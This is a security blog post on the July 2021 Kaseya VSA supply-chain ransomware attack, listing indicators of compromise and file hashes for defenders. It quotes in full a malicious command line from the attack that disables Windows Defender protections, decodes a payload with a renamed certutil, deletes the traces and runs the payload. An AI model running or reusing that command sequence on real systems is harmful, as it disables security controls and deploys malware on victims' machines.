Syntax Bearror

Top Menu

  • Home
  • PowerShell Resource
  • SpiceWorld 2019 Resources
  • Contact Us
  • About Us

Main Menu

  • Home
  • Blog
  • IT Guides
  • How-To’s
  • IT Fixes
  • Cybersecurity
  • Reviews
  • Home
  • PowerShell Resource
  • SpiceWorld 2019 Resources
  • Contact Us
  • About Us

logo

Header Banner

Syntax Bearror

  • Home
  • Blog
  • IT Guides
  • How-To’s
  • IT Fixes
  • Cybersecurity
  • Reviews
Blog
Home›Blog›MSPs Using Kaseya VSA Find Themselves Distributing Ransomware

MSPs Using Kaseya VSA Find Themselves Distributing Ransomware

By Christopher
July 2, 2021
1845
0
Share:

Kaseya, a provider of IT management software, has found itself at the center of what seems to be a supply chain attack. The first signs became visible just after noon EDT today after Kaseya and the Cybersecurity & Infrastructure Security Agency (CISA) encouraged Managed Service Providers (MSPs) to shut down their Kaseya VSA servers to avoid losing administrative access or becoming the victim of ransomware, along with their entire customer base.

Currently, Kaseya is still investigating the cause and is uncertain what has led to these exploitations, but what is known for sure is that when threat actors gain access into a VSA server, they take over the administrative accounts, and spread the ransomware to all of the MSPs customers.

Kaseya VSA is a tool for Remote Monitoring and Management often used by MSPs to efficiently manage and monitor the networks they oversee. So far no other Kaseya products including IT Glue have been noted as an attack vector, but administrators may want to be on the lookout.

According to the security firm Huntress Labs, via their post on r/msp, as of 7:50 pm EDT on Friday, July 2nd, a total of 8 MSPs have reported being affected by the supply chain attack, resulting in ransomware hitting thousands of endpoints across these MSPs, with one MSP in the Netherlands reporting more than 2,100 endpoints affected and over 200 businesses being encrypted. One ransom demand has come in at $5 million, and it’s believed the threat actors are related to the REvil ransomware gang.

The current indicators shared by Huntress Labs in their Reddit post and others are as follows:

  • gent.crt is dropped by the Kaseya VSA.
  • The file is then decoded with certutil to carve out agent.exe, which is dropped to the C:\kworking folder.
  • Inside agent.exe, are two files. MsMpEng.exe and mpsvc.dll. While the exe is legitimate, the dll is malicious and is used to activate the attack.
  • The VSA procedure is named “Kaseya VSA Agent Hot-fix”

For those who log PowerShell, the may notice this activity coming from the parent path of C:\Program Files (x86)\Kaseya\<ID>\AgentMon.exe:

: “C:\WINDOWS\system32\cmd.exe” /c ping 127.0.0.1 -n 4979 > nul & C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe & echo %RANDOM% >> C:\Windows\cert.exe & C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe & del /q /f c:\kworking\agent.crt C:\Windows\cert.exe & c:\kworking\agent.exe

A copy of the malicious DLL associated with this attack has already been posted on VirusTotal. Additional hashes are as follows per Sophos’s blog:

  • C:\windows\cert.exe
    • 36a71c6ac77db619e18f701be47d79306459ff1550b0c92da47b8c46e2ec0752
  • C:\windows\msmpeng.exe
    • 33bc14d231a4afaa18f06513766d5f69d8b88f1e697cd127d24fb4b72ad44c7a
  • C:\kworking\agent.crt
  • C:\Windows\mpsvc.dll
    • 8dd620d9aeb35960bb766458c8890ede987c33d239cf730f93fe49d90ae759dd
  • C:\kworking\agent.exe
    • d55f983c994caa160ec63a59f6b4250fe67fb3e8c43a388aec60a4a6978e9f1e

Thanks to Sophos and HuntressLabs for their contributions toward helping the community learn and react to this attack as it remains ongoing. Check back for additional updates as available.

TagsKaseyaRansomwareREvil
Previous Article

New Posting Schedule for Bear Security

Next Article

PrintNightmare Part II – Print Spooler Remains ...

Share:

Christopher

Christopher Clai is a Senior Security Engineer, IT Generalist, and Developer from Chicago, IL with over 20 years of experience in Information Technology ranging from small businesses to Fortune 500's. Chris loves the Pacific Northwest, Sushi, Invader Zim, Rugby, World of Warcraft, raves, and is an avid user of Microsoft and Linux-based technologies.

Related articles More from author

  • Frag Attack Icon
    Bear Security

    Bear Security – Security News For Week of May 15th, 2021

    May 15, 2021
    By Christopher
  • Collage of Hundred Dollar Bills and Bitcoin Coins in Silver and Gold
    Bear Security

    Bear Security – Security News for the Week of July 26th, 2021

    July 26, 2021
    By Christopher
  • Colorado Flag Waving
    Bear Security

    Bear Security – Security News for the Week of July 19th, 2021

    July 19, 2021
    By Christopher
  • Bear Security

    Bear Security – Security News for Week of June 5th, 2021

    June 5, 2021
    By Christopher
  • Looking suspiciously at a Lemon Duck
    Bear Security

    Bear Security – Security News For Week of May 22nd, 2021

    May 22, 2021
    By Christopher
  • Collage Photo Representing Story
    Bear Security

    Bear Security – Security News for the Week of July 12th, 2021

    July 12, 2021
    By Christopher

Leave a reply Cancel reply

  • IT Fixes

    Dell Laptops Showing “Press Power Button and Volume Down to Login”

  • Reviews

    Review of the Harmon Kardon Invoke – Powered by Cortana

  • Blog

    Premiering Our New Weekly Web Show, Bear Security!

Follow Us on Social

See the Syntax at These Events

All appearances for 2020 have been cancelled due to COVID-19. Stay safe out there and see you all at events in 2021!

Like This Content?

Help Sytnax Bearror create more content, videos, podcasts, scripts, and more by contributing to our caffiene and technology addictions.

Subscribe to our Patreon

Buy Us a Coffee

Most Popular

IT Fixes

Dell Laptops Showing “Press Power Button and Volume Down to Login”

  • How to Root AT&T Samsung S5 G900A (Up to Lollipop 5.0)

    By Christopher
    May 21, 2015
  • Fixing APC PowerChute Personal Edition Not Detecting UPS on Windows 10

    By Christopher
    March 15, 2021
  • Windows 10 Locking Up Intermittently with File Operations

    By Christopher
    October 24, 2015
  • PrintNightmare Part II – Print Spooler Remains Vulnerable Across Windows

    By Christopher
    July 3, 2021

Latest Tweets

  • My time on this social network has come to an end. Fair winds my friends. Find me at: https://t.co/G1ygbdZ5Cd:… https://t.co/qEwtgbJlJm

    Nov 20, 2022
  • Midterms must not have been loud enough. Millennials and Gen Z, get louder.

    Nov 14, 2022
  • Given the direction of things, I'll likely be leaving the bird app. Let's connect via other platforms!… https://t.co/4bl04V46mz

    Oct 31, 2022
  • If you are a member of ISC2, this is a good thread to read on the upcoming vote. I agree with the author, these are… https://t.co/O1dFGUbQQG

    Oct 17, 2022
  • Maybe unpopular opinion? Microsoft needs to make Threat Explorer a part of the Defender for 365 P1 License. Threat… https://t.co/1x0qnoMRrb

    Oct 12, 2022

Categories

Bear Security Blog Cybersecurity How To's IT Fixes Reviews

Copyright Statement

Creative Commons License
This work is licensed under a Creative Commons Attribution-NonCommercial-NoDerivatives 4.0 International License.
©2014 - 2021 - SyntaxBearror.io. All rights reserved unless otherwise noted.